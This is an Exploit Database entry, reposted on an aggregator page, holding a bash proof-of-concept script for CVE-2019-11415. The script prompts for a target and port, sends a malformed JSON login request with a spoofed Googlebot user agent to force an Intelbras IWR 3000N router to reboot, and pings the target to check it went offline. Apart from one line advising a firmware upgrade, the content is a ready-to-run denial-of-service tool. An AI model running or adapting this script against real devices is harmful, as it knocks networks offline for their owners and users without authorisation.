Intelbras IWR 3000N – Denial of Service (Remote Reboot)

• Exploit Database
• 16 阅读

• 作者： Social Engineering Neo
  日期： 2019-04-30
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/46768/

• #/bin/bash
  
  # PoC based on CVE-2019-11415 created by Social Engineering Neo.
  #
  # Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/
  #
  # A malformed login request allows remote attackers to cause a denial of service (reboot), as demonstrated by JSON misparsing of the \""} string to v1/system/login.
  #
  # Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.
  
  clear
  read -p "Enter Target Address Followed by Port: " target port # localhost 8080
  
  alive=$(ping -c 1 $target | grep icmp* | wc -l)
  if [ "$alive" -eq 0 ]; then
  echo Target May be Offline or Blocking ICMP requests.
  read -p "Would you Like to Proceed? (Y/n): " ans
  if [ "$ans" = 'n' ] || [ "$ans" = 'N' ]; then
  clear
  exit
  fi
  fi
  
  if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
  grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' --compressed --data-binary '\""}' $target:$port/v1/system/login)
  else
  echo "Incorrect Port."
  fi
  
  clear
  alive=$(ping -c 1 $target | grep icmp* | wc -l)
  if [ "$alive" -eq 0 ]; then
  echo Router Successfully Taken Offline. #NOTE: if router blocks ICMP requests this may be inaccurate.
  else
  echo Exploit Unsuccessfull, Target May Not be Vulnerable.
  fi